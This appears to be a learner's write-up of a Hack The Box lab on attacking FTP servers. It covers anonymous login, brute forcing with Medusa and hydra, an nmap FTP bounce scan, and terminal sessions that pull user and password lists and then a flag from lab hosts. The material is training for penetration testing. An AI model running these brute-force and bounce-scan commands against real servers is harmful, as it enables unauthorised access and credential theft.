The File Transfer Protocol (FTP) is a standard network protocol used to transfer files between computers. It also performs directory and files operations, such as changing the working directory, listing files, and renaming and deleting directories or files. By default, FTP listens on port TCP/21.
To attack an FTP Server, we can abuse misconfiguration or excessive privileges, exploit known vulnerabilities or discover new vulnerabilities. Therefore, after gaining access to the FTP Service, we need to be aware of the content in the directory so we can search for sensitive or critical information, as we previously discussed. The protocol is designed to trigger downloads and uploads with commands. Thus, files can be transferred between servers and clients. A file management system is available to the user, known by the operating system. Files can be stored in folders, which may be located in other folders. This results in a hierarchical directory structure. Most companies use this service for software or website development processes.
Enumeration
Nmap default scripts -sC includes the ftp-anon Nmap script which checks if a FTP server allows anonymous logins. The version enumeration flag -sV provides interesting information about FTP services, such as the FTP banner, which often includes the version name. We can use the ftp client or nc to interact with the FTP service. By default, FTP runs on TCP port 21.
As we discussed, anonymous authentication can be configured for different services such as FTP. To access with anonymous login, we can use the anonymous username and no password. This will be dangerous for the company if read and write permissions have not been set up correctly for the FTP service. Because with the anonymous login, the company could have stored sensitive information in a folder that the anonymous user of the FTP service could have access to.
This would enable us to download this sensitive information or even upload dangerous scripts. Using other vulnerabilities, such as path traversal in a web application, we would be able to find out where this file is located and execute it as PHP code, for example.
Anonymous Authentication
Once we get access to an FTP server with anonymous credentials, we can start searching for interesting information. We can use the commands ls and cd to move around directories like in Linux. To download a single file, we use get, and to download multiple files, we can use mget. For upload operations, we can use put for a simple file or mput for multiple files. We can use help in the FTP client session for more information.
In the Footprinting module, we cover detailed information about possible misconfigurations of such services. For example, many different settings can be applied to an FTP server, and some of them lead to different options that could cause possible attacks against that service. However, this module will focus on specific attacks rather than finding individual misconfigurations.
Protocol Specifics Attacks
Many different attacks and methods are protocol-based. However, it is essential to note that we are not attacking the individual protocols themselves but the services that use them. Since there are dozens of services for a single protocol and they process the corresponding information differently, we will look at some.
Brute Forcing
If there is no anonymous authentication available, we can also brute-force the login for the FTP services using a list of the pre-generated usernames and passwords. There are many different tools to perform a brute-forcing attack. Let us explore one of them, Medusa. With Medusa, we can use the option -u to specify a single user to target, or you can use the option -U to provide a file with a list of usernames. The option -P is for a file containing a list of passwords. We can use the option -M and the protocol we are targeting (FTP) and the option -h for the target hostname or IP address.
Note: Although we may find services vulnerable to brute force, most applications today prevent these types of attacks. A more effective method is Password Spraying.
Brute Forcing with Medusa
FTP Bounce Attack
An FTP bounce attack is a network attack that uses FTP servers to deliver outbound traffic to another device on the network. The attacker uses a PORT command to trick the FTP connection into running commands and getting information from a device other than the intended server.
Consider we are targetting an FTP Server FTP_DMZ exposed to the internet. Another device within the same network, Internal_DMZ, is not exposed to the internet. We can use the connection to the FTP_DMZ server to scan Internal_DMZ using the FTP Bounce attack and obtain information about the server's open ports. Then, we can use that information as part of our attack against the infrastructure.
The Nmap -b flag can be used to perform an FTP bounce attack:
Modern FTP servers include protections that, by default, prevent this type of attack, but if these features are misconfigured in modern-day FTP servers, the server can become vulnerable to an FTP Bounce attack.
When you spawn your target, please wait up to 60 more seconds after seeing the IP address to ensure the corresponding service is launched correctly.
What port is the FTP service running on?
Scan the target:
What username is available for the FTP server?
Enumerate anonymous's files:
Using the credentials obtained earlier, retrieve the flag.txt file. Submit the contents as your answer.
Use hydra to crack credentials:
Use the credentials to connect with ftp and get the flag:
0xH4shDumb@htb[/htb]$ ftp 192.168.2.142
Connected to 192.168.2.142.
220 (vsFTPd 2.3.4)
Name (192.168.2.142:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 9 Aug 12 16:51 test.txt
226 Directory send OK.
0xH4shDumb@htb[/htb]$ medusa -u fiona -P /usr/share/wordlists/rockyou.txt -h 10.129.203.7 -M ftp
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT CHECK: [ftp] Host: 10.129.203.7 (1 of 1, 0 complete) User: fiona (1 of 1, 0 complete) Password: 123456 (1 of 14344392 complete)
ACCOUNT CHECK: [ftp] Host: 10.129.203.7 (1 of 1, 0 complete) User: fiona (1 of 1, 0 complete) Password: 12345 (2 of 14344392 complete)
ACCOUNT CHECK: [ftp] Host: 10.129.203.7 (1 of 1, 0 complete) User: fiona (1 of 1, 0 complete) Password: 123456789 (3 of 14344392 complete)
ACCOUNT FOUND: [ftp] Host: 10.129.203.7 User: fiona Password: family [SUCCESS]
0xH4shDumb@htb[/htb]$ nmap -Pn -v -n -p80 -b anonymous:password@10.10.110.213 172.17.0.2
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-27 04:55 EDT
Resolved FTP bounce attack proxy to 10.10.110.213 (10.10.110.213).
Attempting connection to ftp://anonymous:password@10.10.110.213:21
Connected:220 (vsFTPd 3.0.3)
Login credentials accepted by FTP server!
Initiating Bounce Scan at 04:55
FTP command misalignment detected ... correcting.
Completed Bounce Scan at 04:55, 0.54s elapsed (1 total ports)
Nmap scan report for 172.17.0.2
Host is up.
PORT STATE SERVICE
80/tcp open http
<SNIP>
H4sh@Dumb /workspace ▸ nmap -sCV -F -T4 10.129.203.6
Starting Nmap 7.93 ( https://nmap.org ) at 2026-02-12 08:48 CET
Stats: 0:00:12 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 60.00% done; ETC: 08:48 (0:00:08 remaining)
Stats: 0:00:21 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 80.00% done; ETC: 08:48 (0:00:05 remaining)
Stats: 0:01:00 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 92.50% done; ETC: 08:49 (0:00:01 remaining)
Nmap scan report for 10.129.203.6
Host is up (0.069s latency).
Not shown: 95 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 7108b0c4f3ca9757649770f9fec50c7b (RSA)
| 256 45c3b51463993d9eb32251e59776e150 (ECDSA)
|_ 256 2ec2416646efb68195d5aa3523945538 (ED25519)
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.16.1-Ubuntu
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
2121/tcp open ftp
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (InlaneFTP) [10.129.203.6]
| Invalid command: try being more creative
| Invalid command: try being more creative
| NULL:
|_ 220 ProFTPD Server (InlaneFTP) [10.129.203.6]
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port2121-TCP:V=7.93%I=7%D=2/12%Time=698D85CB%P=x86_64-pc-linux-gnu%r(NU
SF:LL,2F,"220\x20ProFTPD\x20Server\x20\(InlaneFTP\)\x20\[10\.129\.203\.6\]
SF:\r\n")%r(GenericLines,8B,"220\x20ProFTPD\x20Server\x20\(InlaneFTP\)\x20
SF:\[10\.129\.203\.6\]\r\n500\x20Invalid\x20command:\x20try\x20being\x20mo
SF:re\x20creative\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x2
SF:0creative\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: ATTCSVC-LINUX, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-time:
| date: 2026-02-12T07:48:54
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.72 seconds
H4sh@Dumb /workspace ▸ TARGET=10.129.203.6
H4sh@Dumb /workspace ▸ ftp "$TARGET" 2121
Connected to 10.129.203.6.
220 ProFTPD Server (InlaneFTP) [10.129.203.6]
Name (10.129.203.6:root): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||19486|)
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 ftp ftp 1959 Apr 19 2022 passwords.list
-rw-rw-r-- 1 ftp ftp 72 Apr 19 2022 users.list
226 Transfer complete
ftp> get users.list
local: users.list remote: users.list
229 Entering Extended Passive Mode (|||13587|)
150 Opening BINARY mode data connection for users.list (72 bytes)
72 153.85 KiB/s
226 Transfer complete
72 bytes received in 00:00 (1.08 KiB/s)
ftp> get passwords.list
local: passwords.list remote: passwords.list
229 Entering Extended Passive Mode (|||25162|)
150 Opening BINARY mode data connection for passwords.list (1959 bytes)
1959 3.32 MiB/s
226 Transfer complete
1959 bytes received in 00:00 (28.41 KiB/s)
ftp> exit
221 Goodbye.
H4sh@Dumb /workspace ▸ hydra -L users.list -P passwords.list -s "$PORT" ftp://"$TARGET"
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-02-12 08:59:11
[DATA] max 16 tasks per 1 server, overall 16 tasks, 2750 login tries (l:11/p:250), ~172 tries per task
[DATA] attacking ftp://10.129.203.6:2121/
[STATUS] 256.00 tries/min, 256 tries in 00:01h, 2494 to do in 00:10h, 16 active
[2121][ftp] host: 10.129.203.6 login: robin password: xxxxxxxxxxxxxxx
H4sh@Dumb /workspace ▸ ftp "$TARGET" 2121
Connected to 10.129.203.6.
220 ProFTPD Server (InlaneFTP) [10.129.203.6]
Name (10.129.203.6:root): robin
331 Password required for robin
Password:
230 User robin logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||22224|)
150 Opening ASCII mode data connection for file list
-rw-rw-r-- 1 robin robin 27 Apr 18 2022 flag.txt
226 Transfer complete
ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||21668|)
150 Opening BINARY mode data connection for flag.txt (27 bytes)
27 55.39 KiB/s
226 Transfer complete
27 bytes received in 00:00 (0.38 KiB/s)
ftp> exit
221 Goodbye.
H4sh@Dumb /workspace ▸ cat flag.txt
HTB{xxxxxxxxx_xxx_xxxxxxx}
